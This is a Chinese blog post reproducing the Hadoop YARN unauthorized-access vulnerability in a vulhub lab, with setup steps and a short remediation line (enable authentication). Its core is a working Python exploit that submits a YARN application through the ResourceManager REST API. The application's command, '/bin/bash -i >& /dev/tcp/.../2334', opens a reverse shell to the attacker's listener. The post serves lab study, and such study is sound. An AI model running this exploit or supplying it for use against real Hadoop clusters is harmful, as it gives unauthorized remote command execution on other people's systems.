Hadoop-未授权访问漏洞复现

博客介绍了Hadoop安全漏洞,因服务器开放HDFS的50070 web端口及部分默认服务端口,黑客可操作数据。还给出漏洞复现步骤,用vulhub搭建靶场,执行exp成功反弹shell。最后提出修复方法,即开启身份验证防止未授权访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞介绍:
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

漏洞复现:
使用vulhub搭建靶场
在这里插入图片描述

搭建完进入镜像,成功搭建
在这里插入图片描述

进入靶场。靶机ip:8088

在这里插入图片描述

exp如下:

##!/usr/bin/env python

import requests
import sys

target = 'http://192.168.118.147:8088'##目标机ip
lhost = '192.168.118.1' ##将你的本地ip填在这里,使用nc监听2334端口 

target = sys.argv[1]
#lhost = sys.argv[2]

url = target + '/ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + '/ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/2334 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

执行exp
在这里插入图片描述

成功反弹shell
在这里插入图片描述

漏洞修复:
开启身份验证,防止未经授权用户访问

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值